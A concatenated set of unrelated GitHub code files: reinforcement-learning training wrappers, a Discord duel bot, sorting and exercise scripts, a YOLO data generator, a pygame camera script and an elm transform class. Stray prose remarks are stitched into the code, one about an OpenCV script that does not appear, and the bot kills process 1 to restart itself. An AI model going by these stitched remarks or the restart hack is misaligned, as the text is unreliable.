'DoubleDQN/double_dqn_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/DoubleDQN' + '/double_dqn_{0:.0E}'.format(lr) + '/'\n\n init_logging(log_dir)\n\n # Get the environment and extract the number of actions.\n env = gym.make(env_name)\n np.random.seed(123)\n env.seed(123)\n #nb_actions = len(env.action_space.sample())\n nb_actions = env.action_space.n\n\n # Next, we build a 
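The OpenCV script above mixes the old 2.x API (cv2.SIFT(), cv2.ORB(1000, 1.2)) with commented-out 3.x/4.x calls. On a current OpenCV build, ratio-test matching looks like this sketch (cv2.SIFT_create is the modern constructor):

import cv2

def ratio_test_matches(des1, des2, ratio=0.75):
    # Keep a match only when its best candidate is clearly better than the
    # second best (Lowe's ratio test), as in the commented block above.
    bf = cv2.BFMatcher(cv2.NORM_L2)
    return [m for m, n in bf.knnMatch(des1, des2, k=2)
            if m.distance < ratio * n.distance]

# sift = cv2.SIFT_create()
# kp1, des1 = sift.detectAndCompute(gray1, None)
# kp2, des2 = sift.detectAndCompute(gray2, None)
# good = ratio_test_matches(des1, des2)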
very simple model regardless of the dueling architecture\n # if you enable dueling network in DQN , DQN will build a dueling network base on your model automatically\n # Also, you can build a dueling network by yourself and turn off the dueling network in DQN.\n model = Sequential()\n model.add(Flatten(input_shape=(1,) + env.observation_space.shape))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(16))\n model.add(Activation('relu'))\n model.add(Dense(nb_actions))\n print(model.summary())\n\n # Finally, we configure and compile our agent. You can use every built-in Keras optimizer and\n # even the metrics!\n memory = SequentialMemory(limit=50000, window_length=1)\n policy = BoltzmannQPolicy(tau=exploration_rate)\n # enable the dueling network\n # you can specify the dueling_type to one of {'avg','max','naive'}\n dqn = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=10, enable_double_dqn=True,\n target_model_update=1e-2, policy=policy)\n dqn.compile(Adam(lr=lr), metrics=['mae'])\n if prev_model is not None:\n dqn.load_weights(prev_model)\n\n # Okay, now it's time to learn something! We visualize the training here for show, but this\n # slows down training quite a lot. You can always safely abort the training prematurely using\n # Ctrl + C.\n callbacks = [ModelIntervalCheckpoint(filepath=log_dir + \"/double_dqn_{0:.0E}.h5f\".format(lr), interval=1000),\n FileLogger(filepath=log_dir + \"/monitor.json\", interval=1000)]\n dqn.fit(env, nb_steps=steps, visualize=False, verbose=2, callbacks=callbacks)\n\n # After training is done, we save the final weights.\n dqn.save_weights(log_dir + \"/double_dqn_{0:.0E}.h5f\".format(lr), overwrite=True)\n\n\n\ndef train_deep(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n exploration_fraction=0.1,\n exploration_final_eps=0.02,\n log_dir='./Logs/',\n log_name=None):\n \"\"\"\n Wrapper for training a network with DQN\n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of time-steps to train for [Int]\n :param exploration_fraction: The exploration rate for the algorithm [double or whatever]\n :param exploration_final_eps: The final exploration rate after decay [double or whatever]\n :param lr: The learning rate for the algorithm [double or whatever]\n :param log_dir: The base log folder [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hierarchy for the logging:\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 'DeepQ/deep_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/' + 'DeepQ/deep_{0:.0E}'.format(lr) + '/'\n init_logging(log_dir)\n\n # Generates an environment for the algorithm to train against\n env = DummyVecEnv([lambda: Monitor(gym.make(env_name), log_dir, allow_early_resets=True)])\n\n # Sets up a modified callback funtion to be able to handle saving etc. 
(Not really needed)\n best_mean_reward, n_steps, hist_rew = -np.inf, 0, 0\n\n def callback(_locals, _globals):\n \"\"\"\n Callback called at each step (for DQN an others) or after n steps (see ACER or PPO2)\n :param _locals: (dict)\n :param _globals: (dict)\n \"\"\"\n nonlocal n_steps, best_mean_reward, hist_rew\n # Print stats every 1000 calls\n if (n_steps + 1) % 5 == 0:\n # Evaluate policy performance\n x, y = ts2xy(load_results(log_dir), 'timesteps')\n if len(x) > 0:\n # mean_rew_plot(y, len(x))\n hist_rew = y.copy()\n mean_reward = np.mean(y[-100:])\n if (n_steps + 1) % 100 == 0:\n print(x[-1], 'timesteps')\n print(\n \"Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}\".format(best_mean_reward,\n mean_reward))\n\n # New best model, you could save the agent here\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n print(\"Saving new best model\")\n _locals['self'].save(log_dir + \"/deep_{0:.0E}.pkl\".format(lr))\n\n n_steps += 1\n return False\n\n # Creates the training model etc.\n dqn_nw = DQN('MlpPolicy',\n env,\n learning_rate=lr,\n exploration_fraction=exploration_fraction,\n exploration_final_eps=exploration_final_eps,\n checkpoint_freq=2000,\n learning_starts=1000,\n target_network_update_freq=500)\n\n # Starts the training:\n dqn_nw.learn(total_timesteps=steps, callback=callback)\n\n\ndef make_env(env_id, rank, seed=0, log_dir=''):\n \"\"\"\n Generates a function handle for creating a modified Monitor\n\n :param env_id: The environment name [String]\n :param rank: An additon to the seed to make the monitors have unique seeds\n :param seed:\n :param log_dir: The directory that the monitor saves its \"monitor.csv\" file in\n :return: The generated function handle\n \"\"\"\n\n def _init():\n env = gym.make(env_id)\n env.seed(seed + rank)\n env = Monitor(env, log_dir + 'cpu_' + str(rank) + '/', allow_early_resets=True)\n return env\n\n set_global_seeds(seed)\n return _init\n\n\ndef train_ppo(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n gamma=0.99,\n max_grad_norm=0.5,\n n_mini_batches=4,\n log_dir='./Logs/',\n n_cpus=1,\n prev_model=None,\n log_name=None):\n \"\"\"\n Wrapper for training a network with ppo2. \n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of timesteps to train for [Int]\n :param lr: The learning rate for the algorithm [Double or whatever]\n :param gamma: Discount factor [Double or whatever]\n :param max_grad_norm: The maximum value for the gradient clipping [Double or whatever]\n :param n_mini_batches: Number of training minibatches per update. For recurrent policies,\n the number of environments run in parallel should be a multiple of nminibatches. 
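make_env above returns an _init closure instead of building the environments with a bare lambda inside the SubprocVecEnv list; the reason is Python's late binding of free variables. A tiny sketch of the pitfall the closure avoids:

fns_wrong = [lambda: i for i in range(3)]
print([f() for f in fns_wrong])       # [2, 2, 2] -- all share the final i

def make(i):
    return lambda: i                  # i is bound per call, like _init's rank
fns_right = [make(i) for i in range(3)]
print([f() for f in fns_right])       # [0, 1, 2]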
[Int]\n :param log_dir: The base log folder [String]\n :param n_cpus: The number of environments to setup and run in parallel [Int]\n :param prev_model: Path to any previously trained model to continue training on [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hirachy for the logging:\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 'PPO/ppo_{0:.0E}'.format(lr) + '/'\n else:\n log_dir = log_dir + env_name + '/' + log_name + '/' + 'PPO/ppo_{0:.0E}'.format(lr) + '/'\n monitor_dir = log_dir + 'monitors/'\n init_logging(monitor_dir)\n\n for cp in range(n_cpus):\n if not os.path.isdir(monitor_dir + 'cpu_' + str(cp) + '/'):\n os.mkdir(monitor_dir + 'cpu_' + str(cp) + '/')\n\n # Generates a set of environments to run on the different cpu's in parallel\n env = SubprocVecEnv([make_env(env_name, i, log_dir=monitor_dir) for i in range(n_cpus)])\n\n # Sets up a modified callback function to be able to handle saving etc. (Not really needed)\n best_mean_reward = -np.inf\n n_steps = 0\n\n def callback(_locals, _globals):\n nonlocal n_steps, best_mean_reward\n if (n_steps + 1) % 10 == 0:\n y = np.array([dic['r'] for dic in reversed(_locals['ep_info_buf'])])\n if len(y) > 0:\n mean_reward = np.mean(y)\n print('--------------------------------------')\n print('| Timestep: {0}'.format(_locals['timestep'] * 128))\n print(\"| Best mean reward: {:.2f} - Reward mean 100: {:.2f}\".format(best_mean_reward,\n mean_reward))\n print(\"| Buf length: {:.2f}\".format(len(y)))\n print('--------------------------------------')\n #if _locals['ep_info_buf'][-1]['r'] > best_mean_reward:\n # best_mean_reward = _locals['ep_info_buf'][-1]['r']\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n #print(\"Saving new best model with rewards {:.2F}\".format(_locals['ep_info_buf'][-1]['r']))\n #_locals['self'].save(log_dir + \"/ppo_{0:.0E}\".format(lr) + \".pkl\")\n print(\"Saving new best model with mean rewards {:.2F}\".format(mean_reward))\n _locals['self'].save(log_dir + \"/ppo_{0:.0E}\".format(lr) + \".pkl\")\n n_steps += 1\n return False\n\n # Loads a previously trained model if there exists one, otherwise creates a new one\n if prev_model is not None:\n ppo2_nw = PPO2.load(prev_model, env=env)\n else:\n ppo2_nw = PPO2('MlpPolicy',\n env,\n learning_rate=lr,\n gamma=gamma,\n max_grad_norm=max_grad_norm,\n nminibatches=n_mini_batches)\n\n # Starts the training:\n ppo2_nw.learn(total_timesteps=int(steps), callback=callback)\n\n\ndef init_logging(log_dir='./Logs/'):\n \"\"\"\n Generates a folder hierarchy for the logging\n \n :param log_dir: The base directory for the logs\n \"\"\"\n dirs = log_dir.split(sep='/')\n acc_dir = dirs[0] + '/'\n for d in dirs[1:]:\n acc_dir = acc_dir + '/' + d\n if not os.path.isdir(acc_dir):\n os.mkdir(acc_dir)\n","repo_name":"jonathanJansson/2DoF-Inverted-Pendulum-RL","sub_path":"baselines_wrapper/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23918359864","text":"import logging\nimport os\nimport time\n\nimport discord as ds\nfrom discord.ext import commands\n\nfrom services.db import handles_db, duels_db\nfrom services.api import cf\n\nfrom utils import get_duel_prob\n\nfrom keep_alive import keep_alive\n\n# load_dotenv(\".env\")\n\nbot = commands.Bot(command_prefix=\".\", intents=ds.Intents.all())\n\nlogger = 
logging.getLogger(\"discord\")\n# logger.name = \"khelafinal\"\n\n\nDESCRIPTIONS = {\n \"handle_set\": \"Set or update handle\",\n \"handle_list\": \"Lists all registered handles in this server (incognito)\",\n \"duel\": \"Challenge someone for a duel (mentions opponent)\",\n \"accept\": \"Accept a duel\",\n \"drop\": \"Drop a duel\",\n \"complete\": \"Complete a duel\",\n \"help\": \"Shows all commands (incognito)\",\n}\n\nHELP = {\n \"handle_set `handlle`\": \"Set your own handle\",\n \"handle_set `handlle` `member`\": \"Set `member`'s handle\",\n \"handle_list\": \"Lists all registered handles in this server (incognito)\",\n \"duel `opponent` `rating`\": \"Challenge `opponent` with a duel (mentions opponent)\",\n # \"duel_list\": \"List all duels (ongoing and challenged)\",\n \"accept\": \"Accept a duel\",\n \"drop\": \"Drop a duel\",\n \"complete\": \"Complete a duel\",\n \"help\": \"Shows this message\",\n}\n\n\n@bot.event\nasync def on_ready():\n synced = await bot.tree.sync()\n logger.info(f\"Number of slash commands synced: {len(synced)}\")\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"handle_set\"])\nasync def handle_set(itr: ds.Interaction, handle: str, member: ds.Member = None):\n \"\"\"\n :param handle: Codeforces handle of the member\n :param member: Member of the server whose handle is being set\n \"\"\"\n # set member to self if not mentioned\n if member == None:\n member = itr.user\n\n embed = ds.Embed()\n\n # show error if handle does not exist\n if not cf.handle_exists(handle):\n embed.description = f\"Could not find handle, {handle} in CF\"\n embed.color = ds.Color.red()\n else:\n handles_db.set_or_update_handle(handle, member.id)\n embed.description = f\"Handle of {member.mention} set to {handle}\"\n embed.color = ds.Color.green()\n\n await itr.response.send_message(embed=embed)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"handle_list\"])\nasync def handle_list(itr: ds.Interaction):\n u, h = handles_db.get_all_uid_handle()\n user_mentions = []\n handles = []\n\n # only show hanldes of users who are present in the server\n for uid, handle in zip(u, h):\n user = itr.guild.get_member(uid)\n if user != None:\n user_mentions.append(user.mention)\n handles.append(handle)\n\n embed = ds.Embed()\n # if no users found, show error\n if not user_mentions:\n embed.description = (\n \"No handle found.\\n:point_right: Type `/handleset` to set handle\"\n )\n embed.color = ds.Color.red()\n else:\n embed.title = \"List of all handles\"\n embed.add_field(name=\"Username\", value=\"\\n\".join(user_mentions))\n embed.add_field(name=\"Handle\", value=\"\\n\".join(handles))\n await itr.response.send_message(embed=embed, ephemeral=True)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"duel\"])\nasync def duel(itr: ds.Interaction, opponent: ds.Member, rating: int):\n \"\"\"\n :param opponent: Member of the server you want to challenge\n :param rating: Rating of the problem\n \"\"\"\n uid1 = itr.user.id\n uid2 = opponent.id\n embed = ds.Embed(description=\"Proposing a duel ...\")\n await itr.response.send_message(embed=embed, ephemeral=True)\n embed.color = ds.Color.red()\n embed.description = None\n message_content = None\n ephemeral = False\n if uid1 == uid2:\n embed.description = \"You cannot challenge yourself for a duel\"\n ephemeral = True\n elif not handles_db.uid_exists(uid1):\n embed.description = (\n \"Could not find your handle in the database\\n\"\n \":point_right: Type `/handle_set` to set your handle\"\n )\n ephemeral = True\n elif not handles_db.uid_exists(uid2):\n 
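The slash commands above (handle_set, duel, and those that follow) each rebuild the same red, ephemeral error embed by hand. A small helper in the same style would keep that pattern in one place (sketch, using the module's ds alias):

async def send_error(itr: ds.Interaction, text: str, ephemeral: bool = True):
    # Shared red error embed for the slash commands above.
    embed = ds.Embed(description=text, color=ds.Color.red())
    await itr.response.send_message(embed=embed, ephemeral=ephemeral)

# e.g. in duel():
# await send_error(itr, "You cannot challenge yourself for a duel")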
embed.description = (\n            f\"Could not find {opponent.mention}'s handle in the database\\n\"\n            \":point_right: Type `/handle_set` to set their handle\"\n        )\n    elif rating not in range(800, 3600, 100):\n        embed.description = \"Rating must be a multiple of 100 between 800 and 3500\"\n        ephemeral = True\n    elif duels_db.duel_exists(itr.guild_id, itr.channel_id, uid1):\n        embed.description = (\n            \"You are already in a duel\\n\"\n            \":point_right: Type `/drop` to drop the duel\"\n            # \":point_right: Type `/duel_list` to list all duels\"\n        )\n        ephemeral = True\n    elif duels_db.duel_exists(itr.guild_id, itr.channel_id, uid2):\n        embed.description = (\n            f\"{opponent.mention} is already in a duel\\n\"\n            \":point_right: Type `/drop` to drop the duel\"\n            # \":point_right: Type `/duel_list` to list all duels\"\n        )\n    else:\n        duels_db.new(itr.guild_id, itr.channel_id, uid1, uid2, rating)\n        message_content = opponent.mention\n        embed.title = f\"{opponent.display_name}, are you up for a duel?\\n\"\n        embed.add_field(name=\"Opponent\", value=itr.user.mention)\n        embed.add_field(name=\"Rating\", value=rating)\n        embed.color = None\n        embed.set_footer(text=\"Type /accept to accept the duel\")\n    await itr.followup.send(\n        content=message_content,\n        embed=embed,\n        ephemeral=ephemeral,\n    )\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"accept\"])\nasync def accept(itr: ds.Interaction):\n    embed = ds.Embed(color=ds.Color.red())\n    ephemeral = False\n    message_content = None\n    uid2 = itr.user.id\n\n    if not duels_db.duel_exists(itr.guild_id, itr.channel_id, uid2=uid2):\n        embed.description = \"No one challenged you for a duel\"\n        ephemeral = True\n        await itr.response.send_message(\n            content=message_content, embed=embed, ephemeral=ephemeral\n        )\n    elif duels_db.duel_is_ongoing(itr.guild_id, itr.channel_id, uid2=uid2):\n        embed.description = \"You are already in a duel\"\n        ephemeral = True\n        await itr.response.send_message(\n            content=message_content, embed=embed, ephemeral=ephemeral\n        )\n    else:\n        embed.description = \"Searching for a good problem for you ...\"\n        embed.color = None\n        await itr.response.send_message(embed=embed, ephemeral=True)\n        duel_details = duels_db.get_duel_details(\n            itr.guild_id, itr.channel_id, uid2=uid2\n        )\n        uid1 = duel_details[\"uid1\"]\n        rating = duel_details[\"rating\"]\n\n        contestId, index = get_duel_prob(uid1, uid2, rating)\n        duels_db.add_problem_and_time(\n            itr.guild_id, itr.channel_id, uid1, contestId, index, int(time.time())\n        )\n        u1_mention = itr.guild.get_member(uid1).mention\n        u2_mention = itr.user.mention\n        problem_url = f\"https://codeforces.com/problemset/problem/{contestId}/{index}\"\n\n        message_content = u1_mention\n        embed.title = \"Duel started!\"\n        embed.description = f\"{u1_mention} :crossed_swords: {u2_mention}\"\n        embed.add_field(name=\"Rating\", value=rating)\n        embed.add_field(name=\"Problem URL\", value=problem_url, inline=False)\n        embed.set_footer(text=\"Type /complete after completing the challenge\")\n        await itr.followup.send(\n            content=message_content,\n            embed=embed,\n            ephemeral=ephemeral,\n        )\n        cf.set_problemset_json()\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"drop\"])\nasync def drop(itr: ds.Interaction):\n    embed = ds.Embed()\n    ephemeral = False\n    if duels_db.duel_exists(itr.guild_id, itr.channel_id, uid=itr.user.id):\n        duel_details = duels_db.get_duel_details(\n            itr.guild_id, itr.channel_id, uid=itr.user.id\n        )\n        u1 = itr.guild.get_member(duel_details[\"uid1\"])\n        u2 = itr.guild.get_member(duel_details[\"uid2\"])\n        duels_db.drop(itr.guild_id, itr.channel_id, itr.user.id)\n        
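# (added note) the duel row is gone; now build a public embed recording which duel ended and who dropped it\n        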
embed.title = \"Duel dropped\"\n embed.add_field(\n name=\"Duel\",\n value=f\"{u1.mention} :crossed_swords: {u2.mention}\",\n inline=False,\n )\n embed.add_field(name=\"Dropped by\", value=itr.user.mention)\n else:\n embed.description = \"No duel to drop\"\n embed.color = ds.Color.red()\n ephemeral = True\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"complete\"])\nasync def complete(itr: ds.Interaction):\n embed = ds.Embed(color=ds.Color.red())\n ephemeral = True\n if not duels_db.duel_is_ongoing(itr.guild_id, itr.channel_id, uid=itr.user.id):\n embed.description = \"You are not in an ongoing duel\"\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n else:\n embed.description = \"This might take a while ...\"\n await itr.response.send_message(embed=embed, ephemeral=ephemeral)\n duel_details = duels_db.get_duel_details(\n itr.guild_id, itr.channel_id, uid=itr.user.id\n )\n contestId = duel_details[\"contestId\"]\n index = duel_details[\"index\"]\n prob = (contestId, index)\n uid1 = duel_details[\"uid1\"]\n uid2 = duel_details[\"uid2\"]\n u1 = itr.guild.get_member(uid1)\n u2 = itr.guild.get_member(uid2)\n handle1 = handles_db.uid2handle(uid1)\n handle2 = handles_db.uid2handle(uid2)\n creationTime1 = cf.get_all_accepted_probs(handle1).get(prob, float('inf'))\n creationTime2 = cf.get_all_accepted_probs(handle2).get(prob, float('inf'))\n if creationTime1 == float('inf') and creationTime2 == float('inf'):\n embed.description = (\n \"None of you have completed the challenge yet\\n\"\n \":point_right: Type `/drop` if you want to give up\"\n )\n else:\n ephemeral = False\n embed.title = \"Duel completed\"\n embed.color = None\n duels_db.drop(itr.guild_id, itr.channel_id, uid1)\n if creationTime2 < creationTime1:\n embed.description = f\"{u2.mention} won against {u1.mention}!\"\n else:\n embed.description = f\"{u1.mention} won against {u2.mention}!\"\n await itr.followup.send(embed=embed, ephemeral=ephemeral)\n\n\n@bot.tree.command(description=DESCRIPTIONS[\"help\"])\nasync def help(itr: ds.Interaction):\n embed = ds.Embed(title=\"List of all commands\")\n for name, value in HELP.items():\n embed.add_field(name=\"/\" + name, value=value, inline=False)\n await itr.response.send_message(embed=embed, ephemeral=True)\n\ntry:\n bot.run(\"\") #Give Your Bot Token Here in between \"\"\nexcept ds.errors.HTTPException:\n os.system(\"kill 1\")\n os.system(\"python restarter.py\")\n","repo_name":"nahian00777/Duel_Bot","sub_path":"Duel-Bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8387015339","text":"from sorting.utils import print_tests\nimport random\n\n\nclass QuickSort:\n \"\"\"\n Time complexity:\n - Worst case: O(nˆ2)\n - Best case: O(nlogn)\n - Average case: O(nlogn)\n Space complexity:\n - O(logn)\n \"\"\"\n @staticmethod\n def sort(data):\n if data is None:\n raise TypeError(\"data should not be None.\")\n\n if len(data) < 2:\n return data\n\n pivot_idx = random.randint(0, len(data)-1)\n pivot = data[pivot_idx]\n smaller = [i for i in data[:pivot_idx] if i < pivot] + [i for i in data[pivot_idx+1:] if i < pivot]\n greater = [i for i in data[:pivot_idx] if i >= pivot] + [i for i in data[pivot_idx+1:] if i >= pivot]\n return QuickSort.sort(smaller) + [pivot] + QuickSort.sort(greater)\n\n\nif __name__ == '__main__':\n 
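# (added) inline sanity check: QuickSort.sort returns a new, ascending-sorted list\n    assert QuickSort.sort([3, 1, 2]) == [1, 2, 3]\n    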
print_tests(QuickSort)","repo_name":"tyraeltong/py-algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74923506753","text":"# Question 5. Objective: Write a function that finds the index of a “turning number” in a unimodal array\r\n# array {10, 9, 8, 7, 6, 1, 2, 3, 4, 5}\r\n# The program below prints the index of the smallest value in a vector\r\n\r\nlista = []\r\ni = 0\r\nquantidade = int(input('Tamanho do vetor: '))\r\n\r\nwhile (i < quantidade):\r\n    numero = float(input(\"Valor: \"))  # converted to float so min() compares numbers, not strings\r\n    i += 1\r\n    lista.append(numero)\r\n\r\nprint(lista)\r\nprint('Indice do menor valor:', lista.index(min(lista)))\r\n","repo_name":"Jessicaluana2693/Avalia-o-de-Automa-o-Python","sub_path":"encontrarIndexTurningnumberNoArray.py","file_name":"encontrarIndexTurningnumberNoArray.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12268370603","text":"from utils import anno_file_to_yolo_y\nimport os\nimport numpy as np\nfrom keras.preprocessing import image\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\nclass YoloDataGenerator(object):\n    'Generates batches of images and YOLO targets from the dataset'\n    def __init__(self, image_dir, annotation_dir, grid = (7,7), batch_size = 16, target_size = (224, 224), JPEG_EXT = \"JPEG\"):\n        'Initialization'\n        self.image_dir = image_dir  # base directory of the images\n        self.annotation_dir = annotation_dir\n        ids = []\n        for clz in os.listdir(annotation_dir):\n            ids.append([clz + \"/\" + f for f in os.listdir(annotation_dir + \"/\" + clz)])\n        self.ids = flatten(ids)\n        self.steps = 0\n        self.batch_size = batch_size\n        self.target_size = target_size\n        self.grid = grid\n        self.JPEG_EXT = JPEG_EXT\n\n    def generate(self):\n        while self.steps < len(self.ids) // self.batch_size:\n            ids = self.ids[self.steps * self.batch_size: (self.steps + 1) * self.batch_size]\n            image_files = [self.image_dir + \"/\" + id + \".\" + self.JPEG_EXT for id in ids]\n            anno_files = [self.annotation_dir + \"/\" + id for id in ids]\n            ys = [anno_file_to_yolo_y(af, self.grid) for af in anno_files]\n            xs = [image.img_to_array(image.load_img(image_file,target_size = self.target_size)) for image_file in image_files]\n            self.steps += 1\n            yield np.array(xs, dtype=np.float16), np.array(ys, dtype=np.float16)","repo_name":"huan9huan/ai-learn","sub_path":"yolo/yolo_data_generator.py","file_name":"yolo_data_generator.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"24058697221","text":"import pygame\nimport sys\nimport time\nimport pygame.camera\n\n# Define some colors.\nBLACK = pygame.Color('black')\nWHITE = pygame.Color('red')  # NOTE: misnamed -- this is actually red, not white\n\n\n# This is a simple class that will help us print to the screen.\n# It has nothing to do with the joysticks, just outputting the\n# information.\nclass TextPrint(object):\n    def __init__(self):\n        self.reset()\n        self.font = pygame.font.Font(None, 20)\n\n    def tprint(self, screen, textString):\n        textBitmap = self.font.render(textString, True, WHITE)\n        screen.blit(textBitmap, (self.x, self.y))\n        self.y += self.line_height\n\n    def reset(self):\n        self.x = 10\n        self.y = 10\n        self.line_height = 15\n\n    def indent(self):\n        self.x += 10\n\n    def unindent(self):\n        self.x -= 10\n\n\npygame.init() #initializes pygame\n# Set the width and height of the screen (width, 
height).\nWINDOW_HEIGHT = 700\nWINDOW_WIDTH = 500\nscreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates.\nclock = pygame.time.Clock()\n\n# Initialize the joysticks.\npygame.joystick.init()\n\n# Get ready to print.\ntextPrint = TextPrint()\n\n\n\n\n\n\nwhile not done:\n\n # EVENT PROCESSING STEP\n\n # Possible joystick actions: JOYAXISMOTION, JOYBALLMOTION, JOYBUTTONDOWN,\n # JOYBUTTONUP, JOYHATMOTION\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n print(\"closing\")\n done = True # Flag that we are done so we exit this loop.\n elif event.type == pygame.JOYBUTTONDOWN:\n print(\"Joystick button pressed.\")\n elif event.type == pygame.JOYBUTTONUP:\n print(\"Joystick button released.\")\n\n #\n # DRAWING STEP\n #\n # First, clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n #$screen.fill(BLACK)\n textPrint.reset()\n\n # Get count of joysticks.\n joystick_count = pygame.joystick.get_count()\n\n textPrint.tprint(screen, \"Number of joysticks: {}\".format(joystick_count))\n textPrint.indent()\n\n # For each joystick:\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n try:\n jid = joystick.get_instance_id()\n except AttributeError:\n # get_instance_id() is an SDL2 method\n jid = joystick.get_id()\n textPrint.tprint(screen, \"Joystick {}\".format(jid))\n textPrint.indent()\n\n # Get the name from the OS for the controller/joystick.\n name = joystick.get_name()\n textPrint.tprint(screen, \"Joystick name: {}\".format(name))\n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n textPrint.tprint(screen, \"GUID: {}\".format(guid))\n\n # Usually axis run in pairs, up/down for one, and left/right for\n # the other.\n\n\n buttons = joystick.get_numbuttons()\n for i in range(buttons):\n button = joystick.get_button(i)\n if(button == True and i == 6):\n done = True\n if(button == True and i == 3):\n print(\"camera swap\")\n\n #\n # ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT\n #\n\n # Go ahead and update the screen with what we've drawn.\n pygame.camera.init()\n camlist = pygame.camera.list_cameras()\n if camlist:\n cam = pygame.camera.Camera(camlist[0], (640,480))\n else:\n cam = pygame.camera.Camera('/dev/video0')\n\n cam.start()\n cam.get_image()\n\n\n\n image = cam.get_image()\n screen.blit(image, (0,0))\n pygame.display.update()\n pygame.display.flip()\n\n # Limit to 20 frames per second.\n clock.tick(20)\n\n# Close the window and quit.\n# If you forget this line, the program will 'hang'\n# on exit if running from IDLE.\npygame.quit()\n","repo_name":"winstondo/RoV_ThrusterControlSystem","sub_path":"Deprecated/pygameCamera.py","file_name":"pygameCamera.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"11177161477","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n'''\n---------------------------------\n\n``elm.sample_util.transform``\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'''\nimport copy\nimport logging\n\nfrom earthio import ElmStore\nimport numpy as np\nimport xarray as xr\n\nfrom elm.sample_util.step_mixin import StepMixin\n\nlogger = logging.getLogger(__name__)\n\n__all__ = 
['Transform',]\n\n\n\nclass Transform(StepMixin):\n '''Wraps transform models like IncrementalPCA for use in elm.pipeline.Pipeline'''\n def __init__(self, estimator, partial_fit_batches=None):\n '''Wraps transform models like IncrementalPCA for use in elm.pipeline.Pipeline\n\n Parameters:\n :estimator: such as sklearn.decomposition.IncrementalPCA, a model with fit and transform methods\n :partial_fit_batches: how many times to call partial_fit each time Pipeline is evaluated\n\n '''\n\n self._estimator = estimator\n self._partial_fit_batches = partial_fit_batches\n self._params = estimator.get_params()\n\n def set_params(self, **params):\n filtered = {k: v for k, v in params.items()\n if k != 'partial_fit_batches'}\n self._estimator.set_params(**filtered)\n self._params.update(params)\n p = params.get('partial_fit_batches')\n if p:\n self._partial_fit_batches = p\n\n def get_params(self, **kwargs):\n params = self._estimator.get_params(**kwargs)\n params['partial_fit_batches'] = self._partial_fit_batches\n return params\n\n def _fit_trans(self, method, X, y=None, sample_weight=None, **kwargs):\n fitter_func = getattr(self._estimator, method)\n kw = dict(y=y, sample_weight=sample_weight, **kwargs)\n kw = {k: v for k, v in kw.items() if k in self._params}\n if isinstance(X, (ElmStore, xr.Dataset)):\n if hasattr(X, 'flat'):\n XX = X.flat.values\n space = X.flat.space\n else:\n raise ValueError(\"Call elm.pipeline.steps.Flatten() before Transform in pipeline or otherwise use X as an (earthio.ElmStore or xarray.Dataset)\")\n else:\n raise ValueError('Expected X to be an xarray.Dataset or earthio.ElmStore')\n out = fitter_func(X.flat.values, **kw)\n if 'transform' in method:\n # 'transform' or 'fit_transform' was called\n out = np.atleast_2d(out)\n band = ['transform_{}'.format(idx)\n for idx in range(out.shape[1])]\n coords = [('space', space),\n ('band', band)]\n attrs = copy.deepcopy(X.attrs)\n attrs.update(X.flat.attrs)\n attrs['band_order'] = band\n Xnew = ElmStore({'flat': xr.DataArray(out,\n coords=coords,\n dims=X.flat.dims,\n attrs=attrs)},\n attrs=attrs)\n return (Xnew, y, sample_weight)\n return out # a fitted \"self\"\n\n def partial_fit_batches(self, X, y=None, sample_weight=None, **kwargs):\n for _ in range(self._partial_fit_batches):\n logger.debug('Transform partial fit batch {} of {}'.format(_ + 1, self._partial_fit_batches))\n self.partial_fit(X, 